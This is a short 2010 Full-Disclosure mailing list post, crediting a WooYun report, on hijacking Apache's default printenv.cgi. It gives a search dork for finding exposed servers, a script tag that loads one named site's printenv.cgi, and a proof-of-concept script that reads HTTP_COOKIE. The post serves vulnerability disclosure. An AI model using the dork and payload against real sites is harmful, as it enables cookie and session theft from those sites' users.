[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] apache default printenv.cgi script hijacking
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] apache default printenv.cgi script hijacking
- From: sec yun <root@xxxxxxxxxx>
- Date: Wed, 8 Dec 2010 16:44:18 +0800
<code>
dork: inurl:cgi-bin/printenv
<script src=http://ttzhibo.com/cgi-bin/printenv.cgi></script>
<script>alert(HTTP_COOKIE)</script>
</code>
>From wolegequ@wooyun
http://www.wooyun.org/bugs/wooyun-2010-0584
WooYun is a connection platform for vendors and security researchers
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/